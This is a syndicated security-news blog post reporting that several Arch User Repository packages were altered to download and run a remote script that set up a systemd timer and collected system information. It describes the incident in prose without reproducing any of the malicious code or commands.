Arch Linux AUR Repository Found to Contain Malware

The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories.

AUR User-Maintained Arch Linux Repository Contaminated with Malware

Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project’s user-maintained AUR packages (which stands for “Arch User Repository”) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time – only several days after the dangerous code was placed in the app installation instructions.

The security investigation shows that shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acrored. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner.

Following the discovery all dangerous instances were removed and the user account suspended. The investigation reveals that the executed scripts included a data harvesting component that retrieves the following information:

  • Machine ID.
  • The output of uname -a.
  • CPU Information.
  • Pacman (package management utility) Information.
  • The output of systemctl list-units.

The harvested information was to be transferred to a Pastebin document. The researchers discovered that the scripts contained (Read more...)

*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum authored by Martin Beltov. Read the original post at: